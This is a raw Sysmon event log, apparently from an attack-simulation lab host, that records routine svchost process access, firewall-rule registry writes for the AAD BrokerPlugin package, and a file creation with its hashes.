12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.327{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\PolicyVersionDWORD (0x0000021a) 13241300x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|M=microsoft.aad.brokerplugin_cw5n1h2txyewy|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|D=C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\|PFN=Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{EDFEC311-6084-4835-9B9A-FCB5F059268C}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{E18ACCA9-26B0-4489-9750-CBAF9606BE2F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{CCB0B43D-D639-4AF1-B396-7C77C42ED9F9}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{014F3C97-B1CD-4CAD-AE0C-4514355B694A}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4911EBDD-4116-44FE-8D9B-5EC268F5E22E}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5464942D-757C-4907-A938-25C43C4B0DC2}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D43B2595-8716-4114-96F7-47B4425F1BA7}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6BB4EA5E-82C7-4FD6-AE72-6E90B6DE81BF}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{38BCAA43-7AC2-48A4-A7BA-BF83D8B8555E}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 11241100x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.234{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:15.234 23542300x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.234{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 